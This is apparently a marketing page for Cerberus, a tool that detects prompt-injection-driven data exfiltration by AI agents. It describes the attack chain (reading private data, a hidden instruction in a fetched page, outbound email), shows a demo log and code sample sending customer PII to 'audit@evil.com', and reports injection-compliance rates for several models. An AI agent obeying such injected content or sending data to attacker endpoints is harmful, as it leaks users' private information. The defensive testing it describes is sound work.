Agentic AI Runtime Security

Your AI agents are being
weaponized against you

Every AI agent that can read private data, process external content, and send outbound messages is vulnerable to the same fundamental attack. Cerberus detects, correlates, and blocks it — in real time, before data leaves your system.

Get started in 5 min View on GitHub

cerberus demo

─── Phase 1: Unguarded ───────────────────────────────

→ readCustomerData({}) ← SSN, email, phone — 5 records

→ fetchWebpage({url}) ← injection payload embedded in page

→ sendEmail({to: "audit@evil.com", body: <PII>})

⚠ EXFILTRATION CONFIRMED 1,202 bytes sent · $0.001 total cost

─── Phase 2: Guarded ─────────────────────────────────

→ readCustomerData [Cerberus] turn-000: score=1/4 → ○

→ fetchWebpage [Cerberus] turn-001: score=2/4 → ○

→ sendEmail [Cerberus] turn-002: score=3/4 → ✗ BLOCKED

✓ EXFILTRATION BLOCKED 0 requests to capture server

The Lethal Trifecta

Every AI agent with three capabilities is exploitable. The attack is reproducible today with free-tier API access and three function calls.

Layer 1 — L1

Privileged Access

Agent reads sensitive data — CRM records, PII, internal documents, credentials.

Layer 2 — L2

Injection

External content manipulates the agent's behavior — a hidden instruction in a webpage, email, or document.

Layer 3 — L3

Exfiltration

Agent sends private data to an attacker-controlled endpoint — email, webhook, API call.

When all three fire in the same session, Cerberus scores the session at 3/4 and interrupts the outbound call — before data leaves your system.

Layer 4 (novel): Cross-session memory contamination — an attacker injects a payload into Session 1 that triggers exfiltration in Session 3. No existing tool detects this. Cerberus ships the first deployable defense.

One function call. Full coverage.

Cerberus wraps your existing tool executors. No agent framework changes. No model swaps.

🔍

4 Detection Layers

L1 data source classification, L2 token provenance, L3 outbound intent, L4 memory contamination — all feeding one correlation engine.

🧬

6 Sub-Classifiers

Secrets detector, injection scanner, encoding detector, MCP poisoning scanner, domain classifier, behavioral drift detector.

📡

OpenTelemetry Built-In

One span + 3 metrics per tool call. Plug into Grafana, Datadog, Honeycomb, Jaeger — any OTel backend. Zero overhead when disabled.

🌐

HTTP Proxy Mode

Zero code changes. Run Cerberus as a gateway. Agent routes tool calls to POST /tool/:toolName — detection is transparent.

🔌

Framework Adapters

Native support for LangChain, Vercel AI SDK, and OpenAI Agents SDK out of the box.

📊

Grafana Dashboard

Pre-built dashboard with 14 panels. One command: docker compose -f monitoring/docker-compose.yml up -d

Validated at scale

N=285 real API calls. 30 payloads × 3 trials × 3 providers. Wilson 95% confidence intervals. 6-factor causation scoring. 5 negative control runs per provider — 0 false exfiltrations.

Provider	Model	Any Exfiltration	Full Injection Compliance	95% CI
OpenAI	gpt-4o-mini	100% (90/90)	17.8% (16/90)	[11.2%, 26.9%]
Anthropic	claude-sonnet-4	100% (90/90)	2.2% (2/90)	[0.6%, 7.7%]
Google	gemini-2.5-flash	98.9% (89/90)	48.9% (44/90)	[38.8%, 59.0%]

Provider	Detection Rate	False Positive Rate	L1 Accuracy	L2 Accuracy
OpenAI	23.3%	0.0%	100%	100%
Anthropic	2.2%	0.0%	100%	100%
Google	70.0%	0.0%	100%	100%

L1 and L2 are deterministic — 100% accuracy across all 285 runs, zero FPs, zero FNs. L3 detection tracks successful injection compliance. Control group: 0/15 false exfiltrations.

From zero to blocked attack in 5 minutes

Install the package and wrap your tool executors.

bash

npm install @cerberus-ai/core

TypeScript guard() wraps your tools — no framework changes

import { guard } from '@cerberus-ai/core';

// Your existing tool executors
const tools = {
  readDatabase: async (args) => db.query(args.sql),
  fetchUrl:     async (args) => fetch(args.url).then(r => r.text()),
  sendEmail:    async (args) => mailer.send(args),
};

// One function call — Cerberus intercepts transparently
const { executors: secured } = guard(
  tools,
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted'   },
      { toolName: 'fetchUrl',     trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'], // outbound tools — L3 monitors these
);

// Use exactly like before — Cerberus runs in the middle
await secured.readDatabase({ sql: 'SELECT * FROM customers' });
await secured.fetchUrl({ url: 'https://attacker.com/payload' });
await secured.sendEmail({ to: 'audit@evil.com', body: piiData });
// ↑ [Cerberus] Tool call blocked — risk score 3/4

See the getting-started guide for the full walkthrough, or try the Docker demo with no API keys:

bash — no API keys required

docker run --rm ghcr.io/odingard/cerberus-demo

Your AI agents are being
weaponized against you

The Lethal Trifecta

One function call. Full coverage.

Validated at scale

From zero to blocked attack in 5 minutes

Works with your stack

Start protecting your agents today

Your AI agents are beingweaponized against you

The Lethal Trifecta

One function call. Full coverage.

Validated at scale

From zero to blocked attack in 5 minutes

Works with your stack

Start protecting your agents today

Your AI agents are being
weaponized against you